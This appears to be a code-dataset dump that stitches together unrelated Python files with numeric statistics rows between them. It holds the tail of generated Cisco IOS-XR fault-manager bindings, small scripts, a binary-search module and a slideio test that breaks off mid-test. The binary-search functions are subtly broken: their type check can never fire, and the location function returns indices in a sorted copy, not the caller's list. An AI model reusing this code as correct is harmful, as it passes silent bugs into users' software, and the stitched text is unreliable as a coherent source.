class HardwareFaultDevice(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_device (key)
hw fault device list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: hardware_fault_type
Table of Hardware Failure Type
**type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()
self.yang_name = "hardware-fault-device"
self.yang_parent_name = "hardware-fault-devices"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_device']
self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
self._leafs = OrderedDict([
('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
])
self.hw_fault_device = None
self.hardware_fault_type = YList(self)
self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, ['hw_fault_device'], name, value)
class HardwareFaultType(_Entity_):
"""
Table of Hardware Failure Type
.. attribute:: hw_fault_type (key)
hw fault type list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: condition_description
Faulty Hardware Condition Description
**type**\: str
**config**\: False
.. attribute:: condition_name
Faulty Hardware Condition Name
**type**\: str
**config**\: False
.. attribute:: device_key
Faulty Hardware Device Key
**type**\: str
**config**\: False
.. attribute:: device_version
Faulty Hardware Device Version
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: condition_raised_timestamp
Fault Raised Timestamp
**type**\: str
**config**\: False
.. attribute:: process_id
Faulty Hardware Process ID
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: device_description
Faulty Hardware Device Description
**type**\: str
**config**\: False
.. attribute:: condition_severity
Faulty Hardware Condition Severity
**type**\: str
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()
self.yang_name = "hardware-fault-type"
self.yang_parent_name = "hardware-fault-device"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
])
self.hw_fault_type = None
self.condition_description = None
self.condition_name = None
self.device_key = None
self.device_version = None
self.condition_raised_timestamp = None
self.process_id = None
self.device_description = None
self.condition_severity = None
self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude']['meta_info']
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "platform-fault-manager"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = PlatformFaultManager.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/racks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots, [], name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_summary
Table of Hardware Summary
**type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary>`
**config**\: False
.. attribute:: hardware_fault_devices
Table of Hardware Failure
**type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.fault_summary = PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary()
self.fault_summary.parent = self
self._children_name_map["fault_summary"] = "fault-summary"
self.hardware_fault_devices = PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices()
self.hardware_fault_devices.parent = self
self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot, ['slot'], name, value)
class FaultSummary(_Entity_):
"""
Table of Hardware Summary
.. attribute:: severity_critical_count
Fault Severity Critical count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_emergency_or_alert_count
Fault Severity Emergency count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: total
Faulty Hardware total count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_error_count
Fault Severity Error count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()
self.yang_name = "fault-summary"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
('total', (YLeaf(YType.int32, 'total'), ['int'])),
('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
])
self.severity_critical_count = None
self.severity_emergency_or_alert_count = None
self.total = None
self.severity_error_count = None
self._segment_path = lambda: "fault-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']
class HardwareFaultDevices(_Entity_):
"""
Table of Hardware Failure
.. attribute:: hardware_fault_device
Table of Hardware Failure Device
**type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()
self.yang_name = "hardware-fault-devices"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
self._leafs = OrderedDict()
self.hardware_fault_device = YList(self)
self._segment_path = lambda: "hardware-fault-devices"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices, [], name, value)
class HardwareFaultDevice(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_device (key)
hw fault device list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: hardware_fault_type
Table of Hardware Failure Type
**type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()
self.yang_name = "hardware-fault-device"
self.yang_parent_name = "hardware-fault-devices"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_device']
self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
self._leafs = OrderedDict([
('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
])
self.hw_fault_device = None
self.hardware_fault_type = YList(self)
self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, ['hw_fault_device'], name, value)
class HardwareFaultType(_Entity_):
"""
Table of Hardware Failure Type
.. attribute:: hw_fault_type (key)
hw fault type list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: condition_description
Faulty Hardware Condition Description
**type**\: str
**config**\: False
.. attribute:: condition_name
Faulty Hardware Condition Name
**type**\: str
**config**\: False
.. attribute:: device_key
Faulty Hardware Device Key
**type**\: str
**config**\: False
.. attribute:: device_version
Faulty Hardware Device Version
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: condition_raised_timestamp
Fault Raised Timestamp
**type**\: str
**config**\: False
.. attribute:: process_id
Faulty Hardware Process ID
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: device_description
Faulty Hardware Device Description
**type**\: str
**config**\: False
.. attribute:: condition_severity
Faulty Hardware Condition Severity
**type**\: str
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()
self.yang_name = "hardware-fault-type"
self.yang_parent_name = "hardware-fault-device"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
])
self.hw_fault_type = None
self.condition_description = None
self.condition_name = None
self.device_key = None
self.device_version = None
self.condition_raised_timestamp = None
self.process_id = None
self.device_description = None
self.condition_severity = None
self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Racks']['meta_info']
def clone_ptr(self):
self._top_entity = PlatformFaultManager()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager']['meta_info']
| 60.864341 | 460 | 0.379068 | 9,687 | 157,030 | 5.834727 | 0.017859 | 0.081686 | 0.029547 | 0.135029 | 0.971073 | 0.962916 | 0.956512 | 0.94671 | 0.936926 | 0.926541 | 0 | 0.023705 | 0.5468 | 157,030 | 2,579 | 461 | 60.887941 | 0.770508 | 0.135535 | 0 | 0.797101 | 0 | 0.01023 | 0.112209 | 0.060878 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103154 | false | 0 | 0.040921 | 0 | 0.214834 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8ab022fd5cebf060cd7795602acf2bc9904d2a27 | 184 | py | Python | imperfect_envs/reacher/envs/__init__.py | Stanford-ILIAD/Learn-Imperfect-Varying-Dynamics | 25191f7b076033ac9dbe8fd08f2a92e3caa57cb3 | [
"MIT"
] | 5 | 2021-03-15T04:07:13.000Z | 2022-03-21T18:58:26.000Z | imperfect_envs/reacher/envs/__init__.py | Stanford-ILIAD/Learn-Imperfect-Varying-Dynamics | 25191f7b076033ac9dbe8fd08f2a92e3caa57cb3 | [
"MIT"
] | null | null | null | imperfect_envs/reacher/envs/__init__.py | Stanford-ILIAD/Learn-Imperfect-Varying-Dynamics | 25191f7b076033ac9dbe8fd08f2a92e3caa57cb3 | [
"MIT"
] | 1 | 2021-11-04T03:19:34.000Z | 2021-11-04T03:19:34.000Z | from reacher.envs.reacher import ReacherCustomEnv
from reacher.envs.reacher import ReacherCustomAction1Env, ReacherCustomAction2Env, ReacherCustomRAction1Env, ReacherCustomRAction2Env
| 61.333333 | 133 | 0.902174 | 15 | 184 | 11.066667 | 0.6 | 0.13253 | 0.180723 | 0.26506 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023121 | 0.059783 | 184 | 2 | 134 | 92 | 0.936416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
0a39d1ff6966e81b243aa2917bf0cbb68c3e1cad | 33 | py | Python | problem/10000~19999/16170/16170.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-19T16:37:44.000Z | 2019-04-19T16:37:44.000Z | problem/10000~19999/16170/16170.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-20T11:42:44.000Z | 2019-04-20T11:42:44.000Z | problem/10000~19999/16170/16170.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 3 | 2019-04-19T16:37:47.000Z | 2021-10-25T00:45:00.000Z | print(2018)
print('09')
print(29) | 11 | 11 | 0.69697 | 6 | 33 | 3.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258065 | 0.060606 | 33 | 3 | 12 | 11 | 0.483871 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
0a565510a3fb3adb697ac262a3657727c008983c | 2,860 | py | Python | src/bisearch.py | KPRATT11/bisearch | 3357a8e5f7612ed8e6dbd949b60a328b90a36cbf | [
"MIT"
] | 1 | 2020-04-13T05:04:07.000Z | 2020-04-13T05:04:07.000Z | src/bisearch.py | KPRATT11/bisearch | 3357a8e5f7612ed8e6dbd949b60a328b90a36cbf | [
"MIT"
] | null | null | null | src/bisearch.py | KPRATT11/bisearch | 3357a8e5f7612ed8e6dbd949b60a328b90a36cbf | [
"MIT"
] | null | null | null | # --- Binary Search check target exists in field --- #
def exist(target,field):
if isinstance(field, str):
if " " in field:
field = field.split(' ')
field.sort()
else:
field = list(field)
field.sort()
elif isinstance(field, tuple):
field = list(field)
field.sort()
elif isinstance(field, list):
field.sort()
else:
raise TypeError('Must contain a list or string')
upper_range = len(field)
lower_range = 0
if isinstance(target, int) and isinstance(target, float) and isinstance(target, str) == False:
raise TypeError('Search must be either a Int, Float or String')
if target == field[0]:
return True
while True:
try:
finder = ((upper_range - lower_range) / 2) + lower_range
finder = int(finder)
try:
if field[finder] == target:
return True
elif field[finder] > target:
upper_range = finder
elif field[finder] < target:
lower_range = finder
except TypeError:
raise TypeError('Target Type is not compatible with Field Type')
if upper_range - lower_range == 1:
return False
except IndexError:
return False
# --- Binary Search check where a target is located in field--- #
def location(target,field):
if isinstance(field, str):
if " " in field:
field = field.split(' ')
field.sort()
else:
field = list(field)
field.sort()
elif isinstance(field, tuple):
field = list(field)
field.sort()
elif isinstance(field, list):
field.sort()
else:
raise TypeError('Must contain a list or string')
field.sort()
upper_range = len(field)
lower_range = 0
if isinstance(target, int) and isinstance(target, float) and isinstance(target, str) == False:
raise TypeError('Search must be either a Int, Float or String')
if target == field[0]:
return 0
while True:
try:
finder = ((upper_range - lower_range) / 2) + lower_range
finder = int(finder)
try:
if field[finder] == target:
return finder
elif field[finder] > target:
upper_range = finder
elif field[finder] < target:
lower_range = finder
except TypeError:
raise TypeError('Target Type is not compatible with Field Type')
if upper_range - lower_range == 1:
return False
except IndexError:
return
| 26.981132 | 98 | 0.520629 | 302 | 2,860 | 4.870861 | 0.175497 | 0.067981 | 0.057104 | 0.051666 | 0.916383 | 0.912305 | 0.912305 | 0.912305 | 0.912305 | 0.912305 | 0 | 0.005184 | 0.393007 | 2,860 | 105 | 99 | 27.238095 | 0.842166 | 0.03951 | 0 | 0.935065 | 0 | 0 | 0.087591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0 | 0 | 0 | 0.12987 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0a616ed32e75331ea4230cf1510bf221a9295c12 | 9,243 | py | Python | src/pytests/public/test_gdal_driver.py | Booritas/slideio | fdee97747cc73f087a5538aef6a0315ec75becca | [
"BSD-3-Clause"
] | 6 | 2021-01-25T15:21:31.000Z | 2022-03-07T09:23:37.000Z | src/pytests/public/test_gdal_driver.py | Booritas/slideio | fdee97747cc73f087a5538aef6a0315ec75becca | [
"BSD-3-Clause"
] | 3 | 2020-12-30T16:21:42.000Z | 2022-03-07T09:23:18.000Z | src/pytests/public/test_gdal_driver.py | Booritas/slideio | fdee97747cc73f087a5538aef6a0315ec75becca | [
"BSD-3-Clause"
] | null | null | null | """slideio GDAL driver testing."""
import unittest
import pytest
import cv2 as cv
import slideio
import numpy as np
from testlib import get_test_image_path
class TestGDAL(unittest.TestCase):
"""Tests for slideio GDAL driver functionality."""
def test_not_existing_file(self):
"""
Opening of not existing image.
slideio shall throw RuntimeError
exception during opening of not existing image.
"""
image_path = "missing_file.png"
with pytest.raises(RuntimeError):
slideio.open_slide(image_path, "GDAL")
def test_3chnl_png_metadata(self):
"""Opens 3 channel png file and checks metadata."""
image_path = get_test_image_path(
"gdal",
"img_2448x2448_3x8bit_SRC_RGB_ducks.png"
)
slide = slideio.open_slide(image_path, "GDAL")
self.assertTrue(slide is not None)
num_scenes = slide.num_scenes
self.assertEqual(num_scenes, 1)
self.assertEqual(image_path, slide.file_path)
scene = slide.get_scene(0)
self.assertTrue(scene is not None)
self.assertEqual(image_path, scene.file_path)
self.assertEqual(3, scene.num_channels)
scene_rect = scene.rect
self.assertEqual(0, scene_rect[0])
self.assertEqual(0, scene_rect[1])
self.assertEqual(2448, scene_rect[2])
self.assertEqual(2448, scene_rect[3])
for channel_index in range(scene.num_channels):
channel_type = scene.get_channel_data_type(channel_index)
self.assertEqual(channel_type, np.uint8)
compression = scene.compression
self.assertEqual(compression, slideio.Compression.Png)
res = scene.resolution
self.assertEqual(0, res[0])
self.assertEqual(0, res[1])
def test_1chnl_png_metadata(self):
"""Opens 3 channel png file and checks metadata."""
image_path = get_test_image_path(
"gdal",
"img_2448x2448_1x8bit_SRC_GRAY_ducks.png"
)
slide = slideio.open_slide(image_path, "GDAL")
self.assertTrue(slide is not None)
num_scenes = slide.num_scenes
self.assertEqual(num_scenes, 1)
self.assertEqual(image_path, slide.file_path)
scene = slide.get_scene(0)
